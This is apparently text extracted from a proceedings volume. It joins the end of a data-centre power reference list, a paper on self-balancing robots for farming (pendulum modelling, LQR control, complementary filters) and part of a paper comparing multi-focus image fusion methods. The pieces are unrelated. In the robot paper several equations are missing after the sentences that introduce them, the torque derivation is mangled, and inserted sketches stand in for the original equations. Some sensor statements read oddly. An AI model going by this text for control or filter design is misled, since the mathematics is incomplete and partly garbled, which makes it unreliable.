ing server energy and operational costs in hosting centers. ACM SIGMETRICS Performance
Evaluation Review, 33(1), 303–314.
38. Raghavendra, R., Ranganathan, P., Talwar, V., Wang, Z., & Zhu, X. (2008). No power struggles:
Coordinated multi-level power management for the data center. ACM SIGARCH Computer
Architecture News, 36(1), 48–59.
39. Narayanan, D., Donnelly, A., & Rowstron, A. (2008). Write off-loading: Practical power man-
agement for enterprise storage. ACM Transactions on Storage (TOS), 4(3), 10.
40. Govindan, S., Choi, J., Urgaonkar, B., Sivasubramaniam, A., & Baldini, A. (2009). Statistical
profiling-based techniques for effective power provisioning in data centers. In Proceedings of
the 4th ACM European conference on Computer systems. ACM (pp. 317–330).
41. Leverich, J., Monchiero, M., Talwar, V., Ranganathan, P., & Kozyrakis, C. (2009). Power man-
agement of datacenter workloads using per-core power gating. IEEE Computer Architecture
Letters, 8(2), 48–51.
42. Liu, J., Zhao, F., Liu, X., & He, W. (2009). Challenges towards elastic power management in
internet data centers. In Distributed Computing Systems Workshops, 2009. ICDCS Workshops’
09. 29th IEEE International Conference on. IEEE (pp. 65–72).
43. Urgaonkar, R., Kozat, U. C., Igarashi, K., & Neely, M. J. (2010). Dynamic resource allocation
and power management in virtualized data centers. In Network Operations and Management
Symposium (NOMS), 2010 IEEE. IEEE (pp. 479–486).
44. Beloglazov, A., & Buyya, R. (2010). Energy efficient resource management in virtualized cloud
data centers. In Proceedings of the 2010 10th IEEE/ACM International Conference on Cluster,
Cloud and Grid Computing. IEEE Computer Society (pp. 826–831).
45. Lin, M., Wierman, A., Andrew, L. L., & Thereska, E. (2013). Dynamic right-sizing for power-
proportional data centers. IEEE/ACM Transactions on Networking (TON), 21(5), 1378–1391.
46. Colarelli, D., & Grunwald, D. (2002). Massive arrays of idle disks for storage archives. In
Proceedings of the 2002 ACM/IEEE Conference on Supercomputing (pp. 1–11). IEEE Computer
Society Press.
47. Freeh, V. W., & Lowenthal, D. K. (2005). Using multiple energy gears in mpi programs on a
power-scalable cluster. In Proceedings of the tenth ACM SIGPLAN Symposium on Principles
and Practice of Parallel Programming, (pp. 164–173).
48. Moore, J. D., Chase, J. S., Ranganathan, P., & Sharma, R. K. (2005). Making scheduling
“cool”: Temperature-aware workload placement in data centers. In USENIX Annual Technical
Conference, General Track (pp. 61–75).
49. Heath, T., Centeno, A. P., George, P., Ramos, L., Jaluria, Y., & Bianchini, R. (2006). Mercury and
freon: Temperature emulation and management for server systems. ACM SIGARCH Computer
Architecture News, 34(5), 106–116.
50. Stoess, J., Lang, C., & Bellosa, F. (2007). Energy management for hypervisor-based virtual
machines. In USENIX annual technical conference, (pp. 1–14).
51. Verma, A., Ahuja, P., & Neogi, A. (2008). Pmapper: Power and migration cost aware application
placement in virtualized systems. In Proceedings of the 9th ACM/IFIP/USENIX International
Conference on Middleware. Springer, (pp. 243–264).
52. Leng, J., Hetherington, T., ElTantawy, A., Gilani, S., Kim, N. S., Aamodt, T. M., et al. (2013).
Gpuwattch: Enabling energy optimizations in gpgpus. ACM SIGARCH Computer Architecture
News, 41(3), 487–498.
Application of Robotics in Digital
Farming
Abstract Cultivation is among the most labour-intensive fields, as most of the work
is done manually by the farmer, which reduces productivity and quality. Cropping
fields are vast and require constant monitoring and care, which is difficult to do
manually. This paper presents a detailed study of the application of the self-balancing
robot in the field of digital farming and its advantages over traditional methods.
The study outlines the use of a dynamic system, the inverted cart pendulum, for
robot modelling. Further, it discusses the need for filtering techniques in the device
and introduces the theory behind the control system and controllers such as the linear
quadratic regulator.
1 Introduction
Agriculture evolved through different stages, starting from the primitive stage in
which farmers practised traditional methods such as slash-and-burn farming and
shifting cultivation to grow crops and fodder for their family and cattle needs. Then
came the stage of traditional agriculture, which gave financial and economic value to
the profession of farming: synthetic fertilizers and pesticides, along with electrically
powered machines, came into use and gave agriculture a business outlook and
big markets. Digital farming, which involves the use of IoT-based devices and
robotics, can be applied in various areas:
1. Database maintenance: Digitization in farming provides information about
climatic changes, farm areas in use, financial and economic conditions of the
market, etc. Storing this digital data in a database gives our farmers easy and
swift access to information.
2. Real-time data collection: IoT and digitization together can achieve this task, as
various sensors can be employed to monitor the farmland, soil, vegetation,
humidity, and moisture content of the soil. All the collected data is updated
in the database.
3. Geographical information system (GIS): GIS is one of the most powerful tech-
nological tools for studying the geography of an area and forming intelligent
decisions. The GIS model is employed with a central processing system (CPS).
The CPS is responsible for storing the data, storing the results generated by the
GIS model, and implementing them by instructing the digitized machinery.
4. Digitized agriculture machinery (DAM): Based on the analysis made by the GIS
and GPS models together, digitized agriculture machinery such as fertilizer
control, sowing, and irrigation control devices perform their operations in the
field and store the real-time data in the database accordingly.
Before the onset of digitization in agriculture, most tasks were performed manually
by the farmer; today, with advances in technology, we have ample resources to
reduce manual labour and hence the highly tiring and difficult fieldwork. The
Internet of Things [1] is a branch of technology that provides devices which collect
data through sensors and can form a network layer for data processing and
transmission. A self-balancing robot has a complex structure and design along with
dynamic motion, so its construction and development is a tedious task, but the
following advantages of the device outweigh the development cost:
1. Manoeuvrability: The ability of the device to move freely defines its manoeu-
vrability. Self-balancing robots are highly proficient in this respect because of
their reduced turning radius. A three- or four-wheeled robot covers a greater
radius at turns due to structural limitations, but a two-wheeled self-balancing
robot reduces this turning radius to nearly zero, covering the minimum area.
2. Stability: A two-wheeled self-balancing robot can balance itself on any given
terrain, which makes it suitable for travelling and transporting loads from one
place to another across uneven fields and land.
These advantages make the self-balancing robot well suited to digital agriculture.
Agricultural plots and lands are uneven surfaces that hinder the movement of normal
three- or four-wheeled devices, but with efficient manoeuvrability and a minimal
turning radius, a self-balancing robot can easily traverse the fields for monitoring
purposes. In addition, a two-wheeled robot has fewer wheels and a sleek, narrow
body structure, which makes it compact and increases its locomotive capabilities
across a crop field without damaging the crops. When loaded with the required
sensors, a two-wheeled robot reduces manual labour by monitoring the farmland
and providing real-time data through wireless communication.
This paper presents an in-depth analysis of the application of such robots in digital
farming, as introduced in Sect. 1. The main aim is system modelling through
Application of Robotics in Digital Farming 239
the inverted cart pendulum system, as can be seen in Sect. 3 of the paper. Further,
Sect. 4 explains the concept of control systems, followed by an introduction to the
linear quadratic regulator. Finally, Sect. 5 explains the implementation of filters for
sensor data through mathematical equations.
2 Literature Review
The two-wheeled robot emerged in 1986 under the guidance of Kazuo Yamafuji,
a professor at the University of Electro-Communications in Tokyo. He invented a
robot similar to the inverted pendulum system which can effectively traverse the
ground on two wheels. Since then, this type of robot system has been widely used
in almost all fields, especially agriculture. There are multiple techniques for
constructing such a device, either by using different control systems and controller
methods or by varying the type of filter. The paper [2] utilises an augmented PID
controller to stabilise a robot based on the inverted cart pendulum. Similarly, the
paper [3] shows the implementation of the linear quadratic regulator technique for
balancing. Using additional sensors also provides new features that improve the
robot's functionality, as seen in paper [4], which implements ultrasonic sensors to
avoid obstacles. Further, the motion sensors require filters to remove redundant
signals or noise from the data. The paper [5] employs a complementary filter for a
two-wheeled robot and presents the disadvantages of the Kalman filter for this purpose.
An inverted pendulum system is highly unstable and non-linear; this behaviour
arises because its centre of mass lies above the pivot point. This dynamic system
model is used for two-wheeled robots because of the similarity in structure and
non-linearity.
In Fig. 1, the point around which the pendulum moves is the pivot point. Due to
gravity g, the pendulum has moved to a certain angle ϕ from the vertical axis.
axis. So, the equation of torque generated by the system can be:
So, by using this equation an Euler-Lagrange rule we derive the following equa-
tions: g
ϕ̈g = sin ϕ (2)
l
ẍ
ϕ̈x = cos ϕ (3)
l
240 D. Agarwal et al.
ϕ̈ = ϕ̈_g + ϕ̈_x = (g / l) sin ϕ − (ẍ / l) cos ϕ (4)
Applying the Laplace transform [6] to the above equation yields the transfer
function of the system.
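As a sketch of this step (the intermediate algebra is not reproduced in the paper): linearizing Eq. (4) about the upright position, with sin ϕ ≈ ϕ and cos ϕ ≈ 1, and taking the Laplace transform with zero initial conditions, where A(s) denotes the transform of the cart acceleration ẍ, gives

```latex
s^{2}\Phi(s) = \frac{g}{l}\,\Phi(s) - \frac{1}{l}\,A(s)
\quad\Longrightarrow\quad
\frac{\Phi(s)}{A(s)} = \frac{-1}{l\,s^{2} - g}.
```

This transfer function has an unstable pole at s = √(g/l), which is why a stabilising controller such as the LQR discussed below is required.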
Fig. 2 Diagrammatic representation of the open-loop configuration [7]
In the LQR formulation, the quadratic cost to be minimised is

J = ∑_{k=0}^{n} (x_kᵀ Q x_k + u_kᵀ R u_k) (5)
For the system, the LQR method finds the gain matrix K that stabilises the state
feedback:

u(t) = −K x(t) (6)
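As an illustrative sketch (not the paper's implementation), the gain matrix K minimising the cost in Eq. (5) can be obtained by iterating the discrete-time Riccati recursion. The system matrices below are a hypothetical Euler-discretized linearized pendulum; the values of dt, g/l and the weights Q, R are chosen arbitrarily for illustration:

```python
import numpy as np

def dlqr_gain(A, B, Q, R, iters=500):
    """Iterate the discrete-time Riccati recursion to (approximate)
    convergence and return the gain K such that u_k = -K @ x_k."""
    P = Q.copy()
    for _ in range(iters):
        # K = (R + B'PB)^-1 B'PA, then update the cost-to-go matrix P
        K = np.linalg.solve(R + B.T @ P @ B, B.T @ P @ A)
        P = Q + A.T @ P @ (A - B @ K)
    return K

# Hypothetical linearized inverted-pendulum state [phi, phi_dot],
# Euler-discretized with step dt.
dt, g_over_l = 0.01, 9.81 / 0.5
A = np.array([[1.0, dt],
              [g_over_l * dt, 1.0]])
B = np.array([[0.0],
              [dt]])
Q = np.eye(2)            # state-deviation penalty
R = np.array([[1.0]])    # control-effort penalty

K = dlqr_gain(A, B, Q, R)
closed_loop = A - B @ K
rho = max(abs(np.linalg.eigvals(closed_loop)))  # spectral radius < 1 => stable
```

In practice a library routine such as SciPy's `solve_discrete_are` would be used; the explicit recursion above just makes the structure of the computation visible.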
The technology around us tends to generate data in the form of images, audio, video,
speech, etc. All this data is accepted, received, and transmitted as signals (waves,
to be precise). The signals generated from the data are readable by devices and
machines for further processing. The field concerned with the analysis, production,
and modification of signals is known as signal processing. Signal processing helps
in the functioning of sensors: it can efficiently reduce noise in the
signal, analyse and read data encoded in the signal, convert it from one form to
another, and much more. Generally, these signals are classified in various categories
such as analog, digital, discrete-time, etc. An important process in this field is the
filtering of signals [9]. As the name suggests, filtering is performed to obtain the
required frequency content of the signal passed through it. This is done to reduce or
attenuate the noise that gets added to the signal while passing through the various
components of the device; the device used in this process is a filter.
There is no simple hierarchical classification of filters: they may be non-linear or
linear, time-variant or time-invariant, causal or non-causal, analog or digital, passive
or active, etc. A self-balancing robot requires a frequency filter circuit to improve
the signal obtained from the sensor employed to measure the tilt angle [10]. Such
a filter suppresses frequency components that are not required in the signal
processing and would otherwise contribute noise.
Filters that discriminate signals based on frequency range can be classified as
low-pass and high-pass filters, which will be used further for processing the
sensor data.
A low-pass filter [9, 11] rejects all frequency ranges lying above the cut-off
frequency, accepting only low-frequency ranges. From Fig. 4, we can infer that the
amplitudes at frequencies w1 and w2 are equal, but once the signal is passed through
the filter there is a significant change: w2 is reduced tremendously, indicating that
frequencies higher than wc were attenuated while w1 was allowed to pass through
the filter.
A high-pass filter [9, 11] rejects all frequency ranges lying below the cut-off
frequency, accepting only high-frequency ranges. From Fig. 5, we can infer that the
amplitudes at frequencies w1 and w2 are equal, but once the signal is passed through
the filter there is a significant change: w1 is reduced tremendously, indicating that
frequencies lower than wc were attenuated while w2 was allowed to pass through
the filter. A high-pass filter and a low-pass filter together form a complementary
filter, which provides the functionality and features of both filters.
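A minimal discrete-time sketch of these two filter types (first-order IIR forms; the cut-off is set implicitly by the smoothing factor alpha, whose value here is chosen arbitrarily):

```python
import math

def low_pass(samples, alpha):
    """First-order IIR low-pass: y[n] = alpha*y[n-1] + (1 - alpha)*x[n]."""
    y, out = 0.0, []
    for x in samples:
        y = alpha * y + (1.0 - alpha) * x
        out.append(y)
    return out

def high_pass(samples, alpha):
    """First-order IIR high-pass: y[n] = alpha*(y[n-1] + x[n] - x[n-1])."""
    y, x_prev, out = 0.0, samples[0], []
    for x in samples:
        y = alpha * (y + x - x_prev)
        x_prev = x
        out.append(y)
    return out

def rms(xs):
    return math.sqrt(sum(v * v for v in xs) / len(xs))

# A slow component (like w1, below cut-off) buried in fast noise (like w2).
n = 1000
slow = [math.sin(2 * math.pi * 1 * k / n) for k in range(n)]
fast = [0.5 * math.sin(2 * math.pi * 100 * k / n) for k in range(n)]
mixed = [s + f for s, f in zip(slow, fast)]

smoothed = low_pass(mixed, alpha=0.95)
noise_before = rms([m - s for m, s in zip(mixed, slow)])
noise_after = rms([y - s for y, s in zip(smoothed, slow)])
# noise_after is several times smaller than noise_before:
# the fast component was attenuated, the slow one passed through.
```

Running `high_pass` on the same mixed signal does the opposite: the slow component is attenuated and the fast one passes through.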
In Fig. 6, the signals x and y are noise measurements [12] in a collective signal z
which contains both x and y, and Ẑ is the output produced by the filter. Assume that
y represents high-frequency noise and x represents low-frequency noise. To reduce
these noises accordingly, y is passed through a low-pass filter G(s) that accepts a
low range of frequencies, attenuating the high-frequency noise. The x noise signal
is passed through the complement of G(s), i.e., 1 − G(s), also known as a high-pass
filter, to attenuate low-frequency noise. Thus, a complementary filter intelligently
reduces noise depending upon the frequency of the signals. The robot is fitted with
a GY-87 module to study the tilt and motion of the complete system. This device
reads gyroscope and accelerometer data for all three axes. The set of 12 values
obtained is combined with the help of these filters to give the final result as a tilt
angle. The readings are obtained as follows (Fig. 7).
As the name suggests, an accelerometer is a device used to measure the rate of
change of velocity of a system in its instantaneous domain. The accelerometer's
disadvantage is its fairly slow response to a changing tilt angle; the gyroscope, on
the other hand, uses angular velocity to calculate the shift in the inclination of the
robot, but its value drifts rapidly over time. So, these
sensors show opposite behaviour to each other: the accelerometer fails to work
accordingly in the presence of gravity, and gyroscopes show faulty readings while
moving on plains. The complementary filter sorts and combines the data from both
devices so that the noise is reduced to a minimal value and accurate readings are
obtained. The filter is implemented in the Arduino code in the form of equations.
When the robot changes its orientation, the GY-87 sensor produces values through
the accelerometer and gyroscope; this data must then be processed to attenuate
noise, which is done by the following equations. The equation for the high-pass filter:
Here, s(n) is the value from the gyroscope and S(n) is the actual angle that will be
used in the next cycle of the program. The above equation determines the values
for the gyroscope.
The equation for the low-pass filter:
Here, s(n) is the value from the accelerometer and S(n) is the actual angle that will
be used in the next cycle of the program. The above equation determines the values
for the accelerometer. Now, we combine the pitch values from these filters in the
form of the complementary filter so as to generate the real-time tilt value of the
robot. Although the accelerometer alone could have generated the pitch value, the
addition of the gyroscope lets the robot move over all kinds of high and low surfaces
and even on ramps. Hence, the pitch angle is:
Here, arr[1] is the accelerometer value for the y-axis and arr[2] is the accelerometer
value for the z-axis. Combining this with the gyroscope value for the x-axis, the
final equation of the complementary filter is as follows:
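The paper's exact update equations (in terms of s(n), S(n), and arr[·]) are not reproduced above, so as an illustrative stand-in, a standard complementary-filter update of the kind described can be sketched as follows; the blending factor alpha, the sensor bias, and the noise levels are all hypothetical:

```python
import random

def complementary_pitch(pitch_prev, gyro_rate, accel_pitch, dt, alpha=0.98):
    """One step of a standard complementary filter: integrate the gyro rate
    (high-pass path) and blend in the accelerometer angle (low-pass path).
    alpha close to 1 trusts the gyro on short time scales."""
    return alpha * (pitch_prev + gyro_rate * dt) + (1.0 - alpha) * accel_pitch

random.seed(0)
true_pitch, dt = 10.0, 0.01   # robot held at a constant 10-degree tilt

pitch_est, gyro_only = 0.0, 0.0
for _ in range(2000):
    gyro_rate = 0.0 + 1.0                              # deg/s: true rate plus bias
    accel_pitch = true_pitch + random.gauss(0.0, 2.0)  # noisy but unbiased angle
    pitch_est = complementary_pitch(pitch_est, gyro_rate, accel_pitch, dt)
    gyro_only += gyro_rate * dt                        # raw integration drifts

# gyro_only accumulates 20 degrees of integrated bias over the 20 s run,
# while pitch_est settles near the true 10-degree tilt.
```

This mirrors the behaviour described in the text: the gyro path dominates instant-to-instant changes, while the accelerometer path slowly corrects the drift.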
6 Conclusion
This paper worked through the history of agriculture and explained the evolution
of farming techniques that led to digitisation [13]. The application of IoT-based
devices in this field was explained thoroughly, along with a detailed study of the
benefits and advantages of the two-wheeled robot in cultivation. Further, we saw
the system modelling through the inverted pendulum system, where the torque
equation was used in the Euler–Lagrange rule to find the resultant rotational
acceleration. The paper practically implemented the complementary filter by
working through the concepts of high-pass and low-pass filters; the mathematical
equations for the two were determined and combined to find the tilt angle. The
GY-87 sensor data used to calculate the tilt angle had minimal noise thanks to these
filters. Finally, the controller chosen for balancing the robot, the linear quadratic
regulator, was described briefly.
References
8. Stanese, M., Susca, M., Mihaly, V., & Nascu, I. (2020). Design and control of a self-balancing
robot. In 2020 IEEE International Conference on Automation, Quality and Testing, Robotics
(AQTR). https://doi.org/10.1109/aqtr49680.2020.9129935
9. Kolawole, E. S., Ali, W. H., Cofie, P., Fuller, J., Tolliver, C., & Obiomon, P. (2015). Design
and implementation of low-pass, high-pass and band-pass finite impulse response (FIR) filters
using FPGA. Circuits and Systems, 6, 30–48.
10. Gonzalez, C., Alvarado, I., & Muñoz de la Peña, D. (2017). Low cost two-wheels self-balancing
robot for control education. IFAC-PapersOnLine, 50(1), 9174–9179. https://doi.org/10.1016/
j.ifacol.2017.08.1729
11. Ochala, I., Gbaorun, F., & Okeme, I. C. Design and implementation of a filter for low-noise
applications.
12. Higgins, W. (1975). A comparison of complementary and Kalman filtering. IEEE Transactions
on Aerospace and Electronic Systems, AES-11(3), 321–325. https://doi.org/10.1109/taes.1975.
308081
13. Tang, S., Zhu, Q., Zhou, X., Liu, S., & Wu, M. (n.d.). A conception of digital agriculture.
In IEEE International Geoscience and Remote Sensing Symposium. https://doi.org/10.1109/
igarss.2002.1026858
14. Molnar, J., Gans, S., & Slavko, O. (2020). Design and implementation self-balancing robot.
In 2020 IEEE Problems of Automated Electrodrive. Theory and Practice (PAEP). https://doi.
org/10.1109/paep49887.2020.9240815
15. Self-balancing robot modeling and control using two degree of freedom PID controller. In
Proceedings of the International Conference on Advanced Intelligent Systems and Informatics
2018 (Vol. 845, Chapter 6, pp. 64–76). https://doi.org/10.1007/978-3-319-99010-1_6
Study and Performance Analysis
of Image Fusion Techniques
for Multi-focus Images
Abstract The primary objective of image fusion is to collect and integrate all the
essential and relevant features and information into a single image. In multi-focus
image fusion, information is accumulated from the focused regions of the input
images, and the final combined image contains all the focused regions and objects.
There have been several studies of multi-focus image fusion in both the spatial
domain and the transform domain. Non-focused regions or objects appear in an
image because of the limited depth of field of the camera lens: objects within the
focused region of the lens appear focused, while others appear unfocused. Image
fusion is a scheme to overcome this issue. In this paper, the authors review recent
fusion-based techniques and test certain image fusion techniques, namely discrete
wavelet transform (DWT), independent component analysis (ICA), sparse repre-
sentation (SR), dual-tree complex wavelet transform (DTCWT), non-subsampled
contourlet transform (NSCT), and a hybrid of NSCT + SR, on the Lytro multi-
focus image dataset, and comparatively analyze these methods on the fusion metrics
nonlinear correlation information entropy (NCIE), normalized mutual information
(NMI), the gradient-based metric (GBM), and the phase congruency-based metric
(PCB). The analysis demonstrates that NSCT + SR gives the best performance, with
an NCIE of 0.842, NMI of 1.121, GBM of 0.759, and PCB of 0.848, while SR gives
the second best performance. The authors also elucidate the essential requirements
to consider while framing any fusion-based scheme.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 247
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_20
248 V. Singh and V. D. Kaushik
Abbreviations
cA Coefficient of approximation
cH Horizontal component
cV Vertical component
cD Diagonal component
The limited depth of field of the camera creates a hurdle in capturing all the objects
under focus at a time. This is why a clicked picture is sometimes not fully focused,
i.e., the picture possesses some objects that are blurred or out of focus [1–5]. This
is where the need for multi-focus image fusion arises. Similarly, in the medical
field, there are high-cost instruments to capture the modalities of human organs, but
each modality has its limitations; to avoid the high cost of medical imaging, the
fusion concept also has a very important role to play here, so that medical practi-
tioners and radiologists are able to diagnose a disease accurately [6, 7]. A fused
modality image will possess all the required pertinent information. Image fusion
application areas include microscopic imaging, medical imaging, remote sensing,
and geographical imaging [8–13].
In remote sensing, a satellite is utilized to analyze and examine a remote location;
for example, the area of an earthquake is examined for the estimation and detection
of damage. Research and development in different fields of image processing also
requires images with high resolution as well as spectral images [14–16]. There-
fore, images taken by various satellites, for example SPOT PAN, undergo an image
fusion procedure to obtain a high-resolution image [16–19]. Different types of
cameras capture different kinds of images: infrared cameras produce pictures in the
infrared spectrum, while digital cameras produce images in the visible spectrum.
The two kinds of sensors produce images complementary to one another; in surveil-
lance, for instance, better analysis can be accomplished using both kinds of image
information. Therefore, the concept of image fusion plays a very important role for
analysis and understanding purposes [20–22]. Application areas also include human
perception, computer vision, and machine perception, and the image fusion concept
also minimizes the cost of image transmission [8, 23, 24]. The cost of image trans-
mission is minimized by transmitting a single fused image in place of several images
with different focus areas of the same scene.
Various image fusion schemes have been proposed in the image processing research
field [25–32]. In this research paper, the authors review recent research papers on
multi-focus image fusion schemes, and their effectiveness is evaluated with perfor-
mance metrics. Figure 1 illustrates a sample diagram of the multi-focus image fusion
concept.

Fig. 1 Multi-focus image fusion: source images a and b are combined via a fusion rule into the
fused image
In the literature, different algorithms exist to execute the image fusion model, where
certain conditions need to be followed to produce effective results [24, 33, 34]:
• Important information from the source images should be preserved.
• Irrelevant information should be minimized or omitted from the fused image.
• Inconsistencies should not be part of the fused image.
• Noise should be minimized or omitted from the final fused image.
Image fusion schemes are mainly classified into two main categories: the transform
domain and the spatial domain [20, 35, 36]. Spatial domain fusion schemes operate
directly on the pixel values. Localized spatial features of images, such as a pixel or
a region of an image, are the main fusion pillars of spatial domain schemes [20, 32,
34, 37–52]. In the spatial domain fusion procedure, focused regions taken out of the
input images are brought into consideration, whether in terms of pixels or of features
depicting the focused part of the image. Focus measures such as Laplacian energy
and spatial frequency are used to identify the focused regions of the input images.
Spatial domain fusion schemes are further classified into three categories: decision-
level fusion schemes, pixel-level fusion schemes, and feature-level fusion schemes
[53–57].
In image fusion schemes based on the transform domain, transform coefficients
are generated from the source images [18, 32]. These coefficients are then fused
to obtain the final image coefficients, and the inverse transform is applied to obtain
the final fused image. Transform domain fusion schemes include the discrete cosine
transform [58] and wavelet transforms [29, 59, 60]. The transform domain has better
fusion capabilities than spatial domain methods, because transform domain schemes
represent salient features more accurately and clearly. Depending on the kind of
transform technique used, implementations may be categorized as wavelet-based
fusion schemes [24, 28, 59, 61–66], discrete cosine transform-based fusion schemes
[22, 58, 67, 68], and curvelet transform-based fusion schemes [18, 66].
In DWT-based fusion, two input images are taken, the wavelet transform is applied,
the resulting coefficients are fused, and the inverse DWT is applied to produce the
final fused image. The DWT generates two main parts: an approximation part and
a detail part. For instance, [cA, cH, cV, cD] = dwt2(X, wname) computes the single-
level 2-D discrete wavelet transform of the input data X using the wavelet wname,
returning cA (the approximation coefficients matrix) and cH, cV, and cD (the detail
coefficients matrices representing the horizontal, vertical, and diagonal components,
respectively).
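As an illustration of this decompose-fuse-invert pipeline, the following sketch uses
a single-level Haar wavelet implemented directly in NumPy (standing in for a library
dwt2 call); the averaging rule for cA and the maximum-absolute rule for the detail
matrices are common simple choices, assumed here rather than taken from the paper:

```python
import numpy as np

def haar_dwt2(x):
    """Single-level 2-D Haar DWT: returns cA and the details (cH, cV, cD)."""
    a = (x[:, 0::2] + x[:, 1::2]) / 2.0   # row low-pass (pairwise averages)
    d = (x[:, 0::2] - x[:, 1::2]) / 2.0   # row high-pass (pairwise differences)
    cA = (a[0::2] + a[1::2]) / 2.0        # approximation
    cV = (a[0::2] - a[1::2]) / 2.0        # vertical detail
    cH = (d[0::2] + d[1::2]) / 2.0        # horizontal detail
    cD = (d[0::2] - d[1::2]) / 2.0        # diagonal detail
    return cA, (cH, cV, cD)

def haar_idwt2(cA, cH, cV, cD):
    """Exact inverse of haar_dwt2."""
    a = np.empty((2 * cA.shape[0], cA.shape[1]))
    d = np.empty_like(a)
    a[0::2], a[1::2] = cA + cV, cA - cV    # undo the column transform
    d[0::2], d[1::2] = cH + cD, cH - cD
    x = np.empty((a.shape[0], 2 * a.shape[1]))
    x[:, 0::2], x[:, 1::2] = a + d, a - d  # undo the row transform
    return x

def dwt_fuse(img1, img2):
    """Average the approximation parts; keep the larger-magnitude detail."""
    cA1, (cH1, cV1, cD1) = haar_dwt2(img1)
    cA2, (cH2, cV2, cD2) = haar_dwt2(img2)
    pick = lambda u, v: np.where(np.abs(u) >= np.abs(v), u, v)
    return haar_idwt2((cA1 + cA2) / 2, pick(cH1, cH2),
                      pick(cV1, cV2), pick(cD1, cD2))
```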
The frequency domain is utilized here to fuse the images. Under this category, image
fusion methods based on average measures are considered. In the advanced DCT
methodology, an enhanced version of the direct DCT-based image fusion model is
obtained from the DCT representation of the fused image: the images are first decom-
posed into blocks, the DCT representation of each block is computed, and the average
of the DCT representations of the respective blocks is taken. Finally, the inverse
discrete cosine transform is applied to obtain the final fused image. This image
fusion strategy is known as the modified or "enhanced" DCT technique.
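The block-average procedure described above can be sketched as follows, assuming
8 × 8 blocks and an orthonormal DCT-II matrix. Because the DCT is linear,
averaging the DCT representations is equivalent to averaging the blocks themselves,
which is why practical DCT fusion schemes usually replace the plain average with
a variance- or energy-based selection rule [8, 67]:

```python
import numpy as np

def dct_matrix(n):
    """Orthonormal DCT-II transform matrix of size n x n."""
    k = np.arange(n)[:, None]
    m = np.arange(n)[None, :]
    c = np.cos(np.pi * (2 * m + 1) * k / (2 * n))
    c[0] *= 1.0 / np.sqrt(2.0)
    return c * np.sqrt(2.0 / n)

def block_dct_fuse(img1, img2, bs=8):
    """Average the block-wise DCT representations of two equally sized
    images, then apply the inverse DCT block by block."""
    C = dct_matrix(bs)
    out = np.empty(img1.shape, dtype=float)
    h, w = img1.shape
    for i in range(0, h, bs):
        for j in range(0, w, bs):
            d1 = C @ img1[i:i+bs, j:j+bs] @ C.T   # 2-D DCT of each block
            d2 = C @ img2[i:i+bs, j:j+bs] @ C.T
            avg = (d1 + d2) / 2.0                 # average DCT representation
            out[i:i+bs, j:j+bs] = C.T @ avg @ C   # inverse 2-D DCT
    return out
```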
In the NSCT-based technique, each image is decomposed into low-frequency and
high-frequency components. The two input images are then fused component-wise:
directive contrast is used for the high frequencies, and phase congruency for the
low frequencies. The final fused image is obtained by applying the inverse non-
subsampled contourlet transform (inverse NSCT).
The sparse representation-based image fusion model works in the following manner.
The input image signals are represented as a linear combination of a few elements of
a pre-trained dictionary, where the sparse coefficients characterize the input image.
The steps can be summarized as:
(i) The input images are broken down into overlapping patch segments, and every
patch is rewritten as a vector.
(ii) Sparse representation is computed for the input image patches using the trained
dictionaries.
(iii) A fusion rule is applied to fuse the sparse representation segments.
(iv) The final fused output image is produced from the fused sparse representations.
3.6 DTCWT
A fusion technique based on the DTCWT, i.e., the dual-tree complex wavelet trans-
form, was developed in [69]. It has advantages over the traditional DWT in terms of
shift invariance and directional selectivity.
3.7 ICA
ICA stands for independent component analysis [70]. In ICA-based image fusion,
the images are decomposed over ICA bases. A sliding-window technique is used
to break the source images into patches, and every patch is transformed into the
ICA domain. The transform coefficients are then combined to generate the fused
patches. Finally, the fused output image is created by averaging the overlapping
image patches.
4 Evaluation Metrics
Fusion metrics, also known as evaluation metrics, are utilized to assess the effective-
ness of fusion techniques. Some of these fusion metrics are illustrated below.
A normalized mutual information metric was devised in [71] as an enhanced version
of the traditional MI metric. It is given by the following equation:

NMI = 2 [MI(P, F)/(E(P) + E(F)) + MI(Q, F)/(E(Q) + E(F))]    (1)

where E(P) denotes the entropy of image P and MI(P, Q) denotes the mutual infor-
mation between images P and Q. Here, P and Q are the two input images, and F is
the fused output image.
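Equation (1) can be computed from image histograms as sketched below; 256-bin
histograms over 8-bit images are assumed:

```python
import numpy as np

def entropy(img, bins=256):
    """Shannon entropy E(.) of an 8-bit image, in bits."""
    p = np.histogram(img, bins=bins, range=(0, 256))[0].astype(float)
    p = p[p > 0] / p.sum()
    return -(p * np.log2(p)).sum()

def mutual_info(x, y, bins=256):
    """Mutual information MI(., .) from the joint histogram of two images."""
    pxy = np.histogram2d(x.ravel(), y.ravel(), bins=bins,
                         range=[[0, 256], [0, 256]])[0].astype(float)
    pxy /= pxy.sum()
    px = pxy.sum(axis=1)
    py = pxy.sum(axis=0)
    nz = pxy > 0
    return (pxy[nz] * np.log2(pxy[nz] / (px[:, None] * py[None, :])[nz])).sum()

def nmi(p, q, f):
    """Eq. (1): NMI = 2[MI(P,F)/(E(P)+E(F)) + MI(Q,F)/(E(Q)+E(F))]."""
    return 2.0 * (mutual_info(p, f) / (entropy(p) + entropy(f))
                  + mutual_info(q, f) / (entropy(q) + entropy(f)))
```

A quick sanity check: when the fused image equals both inputs, MI(P, F) = E(P),
so each ratio is 1/2 and NMI reaches its maximum value of 2.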
The nonlinear correlation information entropy (NCIE) metric [72] is computed from
the eigenvalues λ_a of the nonlinear correlation matrix of the two input images and
the fused image:

NCIE = 1 + Σ_{a=1}^{3} (λ_a/3) log_256(λ_a/3)    (2)
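A simplified sketch of Eq. (2) follows; the original metric [72] builds the 3 × 3
matrix from nonlinear correlation coefficients, whereas for brevity this sketch
substitutes plain linear correlation:

```python
import numpy as np

def ncie(p, q, f, b=256):
    """Eq. (2) sketch: NCIE = 1 + sum_a (lam_a/3) * log_b(lam_a/3), where
    lam_a are the eigenvalues of the 3x3 correlation matrix of (P, Q, F).
    Using the absolute linear correlation instead of the nonlinear
    correlation coefficient of [72] is a simplifying assumption."""
    data = np.vstack([p.ravel(), q.ravel(), f.ravel()]).astype(float)
    r = np.abs(np.corrcoef(data))       # 3x3 correlation matrix
    lam = np.linalg.eigvalsh(r)         # its eigenvalues
    lam = lam[lam > 1e-12] / 3.0        # drop numerical zeros, normalize
    return 1.0 + (lam * (np.log(lam) / np.log(b))).sum()
```

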